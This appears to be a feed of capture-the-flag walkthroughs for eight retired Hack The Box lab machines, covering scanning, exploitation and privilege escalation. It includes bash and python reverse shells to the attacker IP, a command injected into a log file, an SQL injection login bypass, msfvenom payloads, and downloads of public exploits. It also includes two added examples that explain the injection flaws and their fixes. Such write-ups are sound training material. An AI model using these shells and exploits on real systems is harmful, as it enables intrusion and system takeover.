CTF | All About Testing
https://allabouttesting.org
Software Testing & Ethical Hacking Fundamentals
Last updated: Thu, 10 Nov 2022 16:40:22 +0000

Hack The Box writeup – ScriptKiddie
https://allabouttesting.org/hack-the-box-writeup-scriptkiddie/
Sun, 06 Jun 2021 13:18:14 +0000

Today we will solve ScriptKiddie, an easy box from Hack The Box (HTB). For those who don’t know, HTB is a practice platform for learning penetration testing.

Box Details

Box Name: ScriptKiddie
OS: Linux
Difficulty: Easy
IP: 10.10.10.226
Points: 20

Summary

  1. Connect to the HTB VPN.
  2. Start the ScriptKiddie box from the HTB portal and ping the machine IP.
  3. Start with Nmap. Found two open ports, 22 and 5555.
  4. Browse http://10.10.10.226:5000.
  5. Found msfvenom functionality on a webpage.
  6. Search Google for an msfvenom exploit.
  7. Found an exploit.
  8. Use msfconsole to generate msf.apk.
  9. Upload it on the web page and set up a listener.
  10. Got user kid.
  11. Check scanlosers.sh.
  12. Rewrite the hackers file and got a pwn shell.
  13. Check sudo permissions on the pwn shell.
  14. sudo to root and found the root flag.

Start with Nmap

Basic Scan

nmap 10.10.10.226

Run default scripts (-sC) and enumerate versions (-sV) against the target.

nmap -sC -sV 10.10.10.226

Scan all ports once by using the -p- option. This step will ensure the coverage of all open ports.

nmap -p- 10.10.10.226

UDP scan

You can use the command below for a UDP scan, although I did not find anything.

nmap -sU -p- 10.10.10.226

Check in Web Browser

Browse http://10.10.10.226:5000

Play with the webpage. Just type an IP to see the response.

The webpage (payloads) shows functionality similar to the msfvenom tool. I searched for an msfvenom exploit that might help me get a user shell.

Found “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”.

Read the description. As it mentions, this vulnerability allows command injection. Using msfconsole, we will create an apk file to upload to the web tool.

Open Metasploit on the Kali machine. Now we will create the apk file using msfconsole.

msfconsole

Search for the exploit by typing the command below.

search msfvenom

Found the exploit. To create the apk file, use the commands below to select it and then display its options.

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

show options

Use the ifconfig command to find your IP and set it as lhost. For lport you can use 1111.

set lhost 10.10.14.2

set lport 1111

set rhost 10.10.10.226

set rport 5555

msfconsole now generates the apk file. As shown in the terminal, msf.apk is stored at /home/kali/.msf4/local/msf.apk. On the webpage, select android as the os and set lhost to the IP of your Kali system. Locate msf.apk and click on generate, but set up a listener with the nc -lvnp 1111 command before you click on generate.

Got a reverse shell on nc. You can confirm the user with the id and ifconfig commands.

id

ifconfig

Get an interactive shell by using the command below.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Now navigate and use the commands below to learn more about the remote system. Use pwd to print the present working directory, cd to change directory, ls -l to list files and wc for a word count of the user.txt file.

pwd

cd ..

ls -l

wc user.txt

Privilege Escalation

Notice two user accounts, kid and pwn. Two directories, kid and pwn, are available. pwn seems to be interesting.

Browse the pwn directory. List its contents with the ls -l command.

ls -l

cat scanlosers.sh

The log file is at /home/kid/logs/hackers. Remember that the cut command drops the first two fields.

Check its permissions with the ls -l command.

Use the commands below.

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/2222 0>&1' #" >> hackers

nc -lvnp 2222

Got user pwn shell. Now get an interactive shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
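Why the scanlosers.sh step above works, and the fix, as an added example that is not code from the original post or from the box: a privileged job pastes a field from a log that another user can write into shell text. The log layout, the scanner command and all function names here are assumptions; the sample lines are constructed.

```python
import ipaddress

# Constructed sample log lines (assumed layout: two leading fields, then source).
SAMPLE_LOG = [
    "2021-06-06 13:18:14 10.10.14.2",
    "2021-06-06 13:19:02 10.10.14.2 trailing-text",
    "a b ;/bin/bash -c 'id' #",
    "too-short",
]


def remainder_after_two_fields(line):
    """Mimic cutting away the first two space-separated fields."""
    parts = line.rstrip("\n").split(" ", 2)
    return parts[2] if len(parts) == 3 else None


def unsafe_command(line):
    """Weak pattern: the field is pasted into text that a shell will parse."""
    return "nmap --top-ports 10 " + str(remainder_after_two_fields(line))


def safe_argv(line):
    """Hardened pattern: accept exactly one IP literal, return an argv list."""
    field = remainder_after_two_fields(line)
    if field is None:
        return None
    try:
        address = ipaddress.ip_address(field)
    except ValueError:
        return None  # anything that is not a bare IP is dropped
    # A list passed to subprocess.run() without shell=True is never shell-parsed.
    return ["nmap", "--top-ports", "10", str(address)]


def triage(lines):
    """Split log lines into scan jobs and rejected (suspicious) entries."""
    jobs, rejected = [], []
    for line in lines:
        argv = safe_argv(line)
        if argv is None:
            rejected.append(line)
        else:
            jobs.append(argv)
    return jobs, rejected


if __name__ == "__main__":
    jobs, rejected = triage(SAMPLE_LOG)
    print("scan jobs:", jobs)
    print("rejected :", rejected)
    print("unsafe   :", unsafe_command(SAMPLE_LOG[2]))
```

Rejected lines are worth alerting on, and the log itself should not be writable by a less privileged account than the one that runs the job.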

Check sudo permissions. Found user msfconsole; login is allowed without a password.

sudo -l

Sudo user msfconsole.

sudo msfconsole

Check id

Found root.txt file.

Hack The Box Writeup – Bashed
https://allabouttesting.org/hack-the-box-writeup-bashed/
Thu, 03 Jun 2021 12:37:27 +0000

Hey friends, today we will solve the retired Bashed Hack The Box (HTB) machine. If you don’t know, HTB is an online platform for practicing penetration testing.

Box Details

Name: Bashed
OS: Linux
Difficulty Level: Easy
Points: 20
IP: 10.10.10.68

Summary

  1. Log into HTB VPN. Bashed machine IP is 10.10.10.68.
  2. Start with an Nmap scan. Found only port 80 open.
  3. No other open port found in either the TCP or the UDP scan.
  4. Check the web page by browsing http://10.10.10.68
  5. Directory brute forcing using the tool ffuf.
  6. Found /dev directory.
  7. Browse /dev. Found directory listing.
  8. phpbash.php is one of the files listed.
  9. Search phpbash on Google and found it is a semi-interactive shell.
  10. Click phpbash.php and navigate different directories.
  11. Found user.txt flag in the home directory.
  12. Get a shell on the local machine using a python reverse shell script.
  13. Got shell on the local system.
  14. Try privilege escalation.
  15. Use command sudo -l
  16. sudo scriptmanager
  17. Use python script for a reverse shell.
  18. Found root.

NMap Scan

Basic Scan

nmap 10.10.10.68

Nmap scan with default scripts

nmap -sC -sV 10.10.10.68

Nmap scan to identify all open ports

nmap -p- 10.10.10.68

Nmap UDP scan

nmap -sU 10.10.10.68

Check Browser

Run ffuf for directory bruteforcing with -u and -w option

ffuf -u http://10.10.10.68/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The ffuf tool lists the directories it discovers; it found the /dev directory.

Search phpbash on Google

phpbash is a standalone semi-interactive web shell. This will help us find the user flag.

Click on phpbash.min.php. Just type Linux commands and you get the output.

Navigate a little and find the user flag in the home directory.

Check for python on the remote machine using the which command.

which python 

Found python on the remote machine. Now we can use a python reverse shell script.

Shell upgrade.

Enter the python command below in the phpbash web shell and, to catch the reverse shell, run nc -lvnp 1234 on the Kali machine. Remember to change the IP and port number in the python command below.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.16",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -lvnp 1234

Get a more interactive shell using tty

python -c 'import pty; pty.spawn("/bin/sh")'

You can run a privilege escalation script. But if you check sudo permissions on the remote machine, you will find the user scriptmanager.

sudo -l

The scripts directory has execute permissions

The system allows sudo as scriptmanager without a password. That means any user can log in with the username scriptmanager without a password.

Use the command below to list the /scripts directory.

ls -l

We noticed that the test.txt file is updated every minute. Update the IP and port in the script below and set up a listener on the Kali system.

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.16\",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py

Set up listener on Kali

nc -lvnp 11111

Check root.

Hack The Box Optimum Writeup
https://allabouttesting.org/hack-the-box-optimum-write-up/
Thu, 27 May 2021 12:13:09 +0000

Hack The Box (HTB) is an online training platform to enhance skills in penetration testing. Optimum is a retired Windows-based box with IP 10.10.10.8.

Box Details

OS: Windows
Difficulty: Easy
Release: 18 March 2017
IP: 10.10.10.8

Start with Nmap

Run Nmap default scripts (-sC) and enumerate versions (-sV).

#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt

To check all open ports

#nmap -p- 10.10.10.8 | tee nmap-all-ports.txt

Run UDP scan

#nmap -sU 10.10.10.8

As port 80 is open, try the IP in a web browser

Search Google for an exploit for HTTP File Server 2.3; found CVE-2014-6287.

Read the instructions to execute the payload

Locate nc.exe on Kali and copy it into the current directory

#locate nc.exe

Edit the payload with your local IP and port, then save it. Use ifconfig to identify the IP address of your machine.

ip_addr = "10.10.14.16"

local_port = "1111"

Execute the exploit

#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 10.10.10.8 80

Got shell. Check user token

Privilege Escalation

Use systeminfo to gather information about the OS

>systeminfo

Copy this output into a text file (I have copied it to config-info.txt). Identify vulnerabilities from the missing patches using the code from the github repository. Run it with the command below:

#python windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo config-info.txt

Many exploits are available for privilege escalation. I have used “Microsoft Windows 8.1 (x64) – ‘RGNOBJ’ Integer Overflow (MS16-098)”. You can download 41020.exe from the github repository.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Transfer the exe file to the machine and execute it using the commands below to get system.

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
41020.exe

Check with the command “whoami”. If the output is as below, you have system.

nt authority\system

Conclusion

This article is a quick write-up on HTB Optimum Windows box. If you have some issues in any step, let me know in the comment section.

Hack The Box Writeup – Delivery
https://allabouttesting.org/hack-the-box-writeup-delivery/
Tue, 25 May 2021 13:22:56 +0000

Delivery is an easy box from Hack The Box (HTB). For those who don’t know, HTB is an online practice platform for learning penetration testing.

Summary

  1. Run nmap to find open ports
  2. As port 80 is open, check it in the browser
  3. Click on the HelpDesk and Contact Us pages
  4. Open a new ticket on the HelpDesk page
  5. Click on Mattermost on the Contact Us page
  6. Sign up on Mattermost using the @delivery.htb email address generated after creating the new ticket
  7. Check Ticket Status
  8. Log in on Mattermost
  9. Use the username and password to SSH
  10. Found user.txt
  11. Check the config file and found the mysql username and password
  12. Log in to mysql and check the Users table
  13. Found username and hashed password (bcrypt)
  14. Use the hashcat tool to crack the password hash
  15. SSH to the box and found root.txt

Start with Nmap

nmap 10.10.10.222

Run the default Nmap scripts with the -sC option; -sV enumerates versions

nmap -sC -sV 10.10.10.222

Scan all ports with Nmap by using -p- options

nmap -p- 10.10.10.222

Run UDP scan with Nmap by using -sU option

nmap -sU 10.10.10.222

Add the entry below to /etc/hosts

10.10.10.222 delivery.htb

Browse http://delivery.htb on Firefox

http://delivery.htb

Click on Contact us.

Read the message on the page carefully

“For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you’ll be able to have access to our MatterMost server.”

As mentioned on the webpage, click on HelpDesk.

Click on Open a New Ticket

Fill in the form and create a new ticket. You receive the message below after the ticket is created successfully.

Click on MatterMost server. As you don’t have an account, click on Create one now. Remember to use the @delivery.htb email id when creating the account.

After the account is created successfully, check the ticket status again and you get a new message.

As suggested in the message, activate the email by copying the URL and pasting it into the browser. You get the message below if you have pasted it correctly.

After successful login, found credentials to the server.

As the SSH port is also open, use the credentials to connect to the remote host.

ssh maildeliverer@10.10.10.222

Just run ls and you will find the user.txt flag.

Privilege escalation

For privilege escalation, check the config file. It contains a mysql username and password.

Refer to /opt/mattermost/config/config.json. Use the command below for the mysql credentials:

cat /opt/mattermost/config/config.json | grep user

Connect mysql

mysql -u mmuser -p

Display available databases

show databases;

Use database mattermost

use mattermost;

Use the command below to display the tables; the Users table seems interesting.

show tables;

Display the username and password from the Users table

select Username, Password from Users;

Save the username and password in the file hash. If you refer to the messages, the last message is about the password “PleaseSubscribe!”

Save it in the file password.

Use the hashcat command below, which applies the best64 rules to the saved password to build a wordlist and brute-force the exact matching password.

hashcat -m 3200 hash password --user -r /usr/share/hashcat/rules/best64.rule

Finally got the matched password

Now just type su - to switch to root

su -

Hack The Box (HTB) Writeup – Cronos
https://allabouttesting.org/hack-the-box-htb-writeup-cronos/
Sun, 23 May 2021 10:14:46 +0000

Today we will solve Cronos, a box of Medium difficulty level from Hack The Box (HTB). If you are new, HTB is an online practice lab for learning penetration testing. This box is helpful in preparing for the OSCP certification.

Summary:

  • Run Nmap to find open ports and services
  • Enumerate DNS
  • Add IP and identified hostnames in /etc/hosts
  • Enumerate HTTP
  • Identify login on admin.cronos.htb
  • Use SQL Injection to bypass login
  • Check for Command Injection
  • Reverse the shell and locate user.txt flag
  • Transfer Linux Privilege scripts from the local machine to low privileged machine
  • Results
  • php reverse shell in crontab
  • Reverse shell and locate root.txt

Start with Nmap

Initial Scan

nmap 10.10.10.13

Run default scripts

nmap -sC -sV 10.10.10.13

Scan all ports

nmap -p- 10.10.10.13

Run UDP scan

nmap -sU 10.10.10.13

Use the dig command to identify hostnames

dig axfr cronos.htb @10.10.10.13

Add the hostnames to /etc/hosts using nano /etc/hosts

Check admin.cronos.htb in the browser

Try SQL injection payloads from the link; I was able to log in successfully with the payload below

' or 1=1 limit 1 -- -+
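Why a payload of this shape gets past a login form, and how a parameterized query stops it, as an added example that is not code from the original post or from the Cronos application. The users table, its columns and the function names are assumptions, the account is constructed, and SQLite stands in for the application's database.

```python
import hashlib
import sqlite3

# Payload quoted in the write-up, as typed into the username field.
PAYLOAD = "' or 1=1 limit 1 -- -+"


def hash_password(password):
    # Unsalted SHA-256 keeps the demo short; a real application uses a password KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Build an in-memory database holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", hash_password("constructed-sample-secret")),
    )
    return db


def vulnerable_query(username, password):
    """String concatenation: whatever the user typed becomes part of the SQL text."""
    return (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password = '" + hash_password(password) + "'"
    )


def login_vulnerable(db, username, password):
    # With PAYLOAD the WHERE clause becomes: username = '' or 1=1 limit 1
    # and the password check is commented out by "--".
    return db.execute(vulnerable_query(username, password)).fetchone() is not None


def login_parameterized(db, username, password):
    """Bound parameters are data only: quotes and comment markers have no SQL meaning."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = db.execute(query, (username, hash_password(password))).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("query seen by the database:")
    print(" ", vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable login accepts payload   :", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterized login accepts payload:", login_parameterized(db, PAYLOAD, "anything"))
```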

Try command injection using the ls command. It confirms that a command injection vulnerability is present in the web application.

Intercept the request in Burp Suite and use the command injection vulnerability to get a reverse shell.

bash -c 'bash -i >& /dev/tcp/10.10.14.16/8000 0>&1'

Got user.txt

Privilege escalation

Spawn a tty shell

python -c 'import pty; pty.spawn("/bin/sh")'

Run the commands below to identify the flavor of the box

uname -a
cat /proc/version
cat /etc/issue

Identify a privilege escalation script for Ubuntu 16.04.2. Download it on the local machine and then transfer it to the compromised machine.

Run Privilege Escalation script

./linpeas.sh

Running the linpeas.sh script found /var/www/laravel/artisan

Check crontab

Download php-reverse-shell.php script

Change local IP and port number

To catch a reverse shell, set up nc and run the php script

Got a reverse shell

Got root.

Devel – Hack The Box (HTB) writeup w/o Metasploit
https://allabouttesting.org/devel-hack-the-box-writeup-w-o-metasploit/
Sat, 28 Nov 2020 13:12:43 +0000

Hack The Box is an online platform that helps in learning penetration testing.

Devel is a retired box with difficulty level Easy.

Start with nmap

#nmap -sC -sV 10.10.10.5
  • -sC scans using default scripts against the target
  • -sV enumerates versions

Two ports open: 21 (ftp) and 80 (http)

Use nmap to scan all ports (0-65535)

#nmap -p- 10.10.10.5 | tee nmap-all-ports.txt
  • -p- scans all ports
  • tee saves the output to the file and also prints it to standard output

nmap UDP scan

#nmap -sU 10.10.10.5 | tee nmap-udp.txt

No ports found in UDP scan

Check the webpage, as port 80 is open

Anonymous login is allowed on ftp. Try to upload test.html

Successfully uploaded test.html. This suggests uploading a payload to get a reverse shell.

msfvenom – tool to create reverse shell

List all modules for formats

#msfvenom -l formats

List all windows payloads.

#msfvenom --list payloads | grep windows

Create payload by using msfvenom

#msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.10.21 LPORT=1111 -o shell.aspx

Upload the payload to the server, as anonymous login is allowed on ftp.

#put shell.aspx

Getting reverse shell

#nc -lvnp 1111

Get shell.

Try to access the Administrator and babis folders, but access is denied.

Privilege Escalation

#systeminfo

The operating system is Windows 7 Enterprise, and no hotfix is installed. This suggests trying an existing exploit. Searching Google turned up MS11-046; its EDB-ID is 40564 and the CVE is CVE-2011-1249.

#searchsploit -m 40564

Refer to the exploit notes to understand how to compile the exploit code.

Compile it using the command below:

#i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Upload it to the machine

#powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.21:2222/MS11-046.exe', 'C:\Users\Public\Downloads\MS11-046.exe')"

Run privilege escalation exploit

#MS11-046.exe

Get root

Legacy – Hack The Box (HTB) write-up
https://allabouttesting.org/legacy-hack-the-box-write-up/
Tue, 24 Nov 2020 18:24:29 +0000

Hack The Box is an online platform which helps in learning penetration testing.

Today we will solve the Legacy box from Hack The Box.

Start with Nmap

#nmap -sC -sV 10.10.10.4

3 ports are open – 139 (netbios-ssn), 445 (microsoft-ds) and 3389 (ms-wbt-server)

Scan UDP ports

#nmap -sU 10.10.10.4

Found open port 137

Try the smbmap and smbclient tools, but nothing is found

#smbmap -H 10.10.10.4
#smbclient -N -L //10.10.10.4

Identify scripts related to smb

#ls /usr/share/nmap/scripts/ | grep smb

Run nmap smb scripts to identify vulnerability

#nmap --script=smb-vuln* 10.10.10.4

Two vulnerabilities: ms08-067 and ms17-010

ms17-010

Get the exploit code from this github repository

Generate payload (exploit) by using msfvenom

#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o exploit.exe

Download script

wget https://github.com/helviojunior/MS17-010/master/send_and_execute.py

Run exploit

#python send_and_execute.py 10.10.10.4 exploit.exe

Start a listener while the exploit executes to get a reverse shell

#nc -lvnp 443

Try whoami; the command is not found

Search for whoami.exe on Kali

Share the folder containing whoami.exe over SMB with the command below

#smbserver.py a /usr/share/windows-binaries/

Use the command below to run whoami

system32>\\10.10.14.21\a\whoami.exe

NT AUTHORITY\SYSTEM confirms root

Hack the Box (HTB) Machine Writeup – Sense
https://allabouttesting.org/hack-the-box-htb-machine-writeup-sense/
Thu, 27 Aug 2020 18:52:46 +0000

Hey friends, today we will solve the Hack the Box (HTB) Sense machine. For people who don’t know, HTB is an online platform for practicing penetration testing skills. We try to identify the methodology in each writeup so that we can use the same method for other HTB boxes.

Using nmap – identifying open ports

#nmap -sC -sV 10.10.10.60 | tee nmap-initial.txt

-sC: run default scripts

-sV: enumerate version

The tee command writes the output to a file.

Only 2 ports, http (80) and https (443), are open.

#nmap -p- 10.10.10.60 | tee nmap-allports.txt

-p- : scanning all ports

No new ports found. This is great, as we now know our attack vector is a web application.

Visit nmap tutorial for more useful commands

Nikto – web server scanner

#nikto -h https://10.10.10.60 | tee nikto.txt

Browse webpage https://10.10.10.60/

Now enumerate using gobuster. This tool helps enumerate directories, files and DNS names.

#gobuster -k -u http://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: target url

-w: wordlist used to enumerate files/directories

-k: skip SSL certificate verification

Two files (/system-users.txt and /changelog.txt) were found. The scan took a long time to find /system-users.txt.

Found username: Rohit. The webpage also appears to be the login page of a firewall.

Now search Google to find the default password.

Found password: pfsense.

Now log in with the identified credentials.

Found the exact version, 2.1.3, of the pfsense firewall.

Now search for pfsense firewall exploits available on Kali using the searchsploit command.

#searchsploit pfsense

Copy the python exploit 43560.py and rename it to shell.py. Identify the syntax by viewing the code. Remember to use python3, otherwise the exploit won’t run successfully.

#python3 shell.py --rhost 10.10.10.60 --lhost 10.10.14.20 --lport 1111 --username rohit --password pfsense

#nc -lvnp 1111

Got root.
